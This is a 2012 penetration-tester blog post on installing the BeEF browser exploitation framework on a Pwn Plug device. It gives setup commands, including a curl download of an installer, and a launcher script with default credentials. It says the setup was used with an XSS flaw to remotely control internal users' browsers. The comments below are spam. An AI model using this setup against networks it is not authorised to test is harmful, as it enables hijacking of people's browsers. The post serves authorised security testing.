Thursday, October 11, 2012

BeEF and Pwnies - The Pwn Plug!


As a Pentester, you sometimes need to think out of the box and use multiple techniques in order to prove to a client that they are vulnerable even in their internal network.  I was recently working with a client which had a XSS vulnerability in one of their internal web applications that just was not accessible from the internet...

Until I introduced the client to BeEF and the Pwn Plug Elite.


I knew I could use BeEF to show the client the vulnerability, but, I needed the BeEF server to be accessible on their internal network. That was where the Pwn Plug came to mind. But, it did not come with BeEF out of the box. With BeEF being so flexible I was able to install it on the Pwn Plug and I wanted to share how I did that.

Here is the code to install all the requirements and setup the beef_launcher script.

All the commands should be typed while logged in to the Pwn Plug.

Code:


# update and install requirements
sudo apt-get update
sudo apt-get install curl git-core ruby subversion
sudo apt-get libssl-dev libsqlite3-dev ruby1.9.2

# PwnPlug 1.1.1 has a directory called storage 
# that is on the SD CARD with Metaspolit
cd /storage/

# Downloading rvm-installer
# bash >> curl would not work
curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer >> rvm-installer
chmod +x rvm-installer
./rvm-installer

# /usr/local/rvm is the install location
echo '[[ -s "/usr/local/rvm/scripts/rvm" ]] && . "/usr/local/rvm/scripts/rvm"' >> ~/.bashrc
source ~/.bashrc
source /usr/local/rvm/scripts/rvm

# Installing rvm....
/usr/local/rvm/scripts/rvm install 1.9.2

# q needs to be pressed during install 
rvm use 1.9.2 --default

# Download BeEF..
git clone git://github.com/beefproject/beef.git
cd beef

# Installing Ruby Gems
gem install bundler
bundle install

The beef_launcher.sh script should be created separately.

# create beef_launcher.sh in pentest / folder 
#################################################
#beef_launcher.sh
#!/bin/bash

export gem paths
export GEM_PATH=/usr/local/rvm/gems/ruby-1.9.2-p320/gems/
export GEM_HOME=/usr/local/rvm/gems/ruby-1.9.2-p320/gems/

# enter beef directory
cd /storage/beef

# print default password information
echo 'DEFAULT USER/PASSWORD: beef/beef'
echo ''

# launch
ruby-1.9.2-p320 beef –x

#end of beef_launcher.sh

And now...

#make /pentest/beef_launcher executable
chmod +x /pentest/beef_launcher.sh

#To run beef type
/pentest/beef_launcher.sh

By installing BeEF onto the Pwn Plug I was able to inject the BeEF hook into the vulnerable web application and remotely control users’ browsers thanks to the tunneling ability of the Pwn Plug. I couldn’t have landed the contract without the use of BeEF and the Pwn Plug.

This post contributed by:

Tobias Mccurry
Independent Security Consultant
Twitter - @lordsaibat
LinkedIn - http://www.linkedin.com/pub/tobias-mccurry-a-security-gsna-gcih/10/b81/477

P.S.
We have it on good authority from the Pwnie Express team that BeEF might be integrated in one or more of the Pwn Plugs soonish. Exciting! Keep an ear to the ground. You'll hear us running.

18 comments:

  1. Good site with informative post. I am looking forward for more posts,. Keep sharing and spreading knowledge. thanks :)

    Assignment writing service reviews

    ReplyDelete
  2. This Browser Exploitation Framework project is good to reduce the vulnerabilities that we are prone. Great suggestions that you have made to remove the threats even in the network we use.term paper writing service reviews

    ReplyDelete
  3. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work.
    hotmail login | red ball

    ReplyDelete
  4. I think the BeEF server will help the users to access the high speed internet. The code for installing the sever is given here so it is very easier for the user to install.
    essay writers uk

    ReplyDelete
  5. Thank you for your information that you've shared. It's really helpful for me.
    * hotmail sign

    ReplyDelete
  6. Thank you for this tremendous and informative post. pay to do my essay is the service to help students. If you want to avail this, get it now.

    ReplyDelete
  7. The blog or and best that is extremely useful to keep I can share the ideas of the future as this is really what I was looking for, I am very comfortable and pleased to come here. Thank you very much.
    animal jam | five nights at freddy's | hotmail login

    ReplyDelete

  8. there will replica rolex always be accompanied by his father's shadow, replica watches
    xsilent but powerful, escort for you, with you gallop blue sky.Time to praise the father of love replica watches uk Father's Day masterpiece watch selection

    ReplyDelete
  9. Thanks for sharing this great. Keep sharing more useful and conspicuous stuff like this. Thank you so much
    192.168.l.l

    ReplyDelete
  10. Awesome and incredible site. I am intrigued all that much in the topic of your online journal, its my first visit upload to instagram

    ReplyDelete
  11. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work instagram online

    ReplyDelete
  12. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work. instagram online

    ReplyDelete
  13. In order to access Gmail, you need to create a google account first. you heard it. So howcreate gmail account
    create new gmail account do you think you can create a new Gmail account. Just follow the steps.

    ReplyDelete
  14. i dont think that i can make it like this anyway in my lifetime :( it is saddening but i will do try all my best. thank you for teaching.
    dissertation Writing Service

    ReplyDelete
  15. Really cool post. It's truly extremely pleasant and valuable post.Thanks for offering this to us! it's my first visit. Custom Essay Writing Service

    ReplyDelete
  16. Your sharing of this content is very interesting. I like it very much. Hopefully I will be able to read more post from you. Write My Essays

    ReplyDelete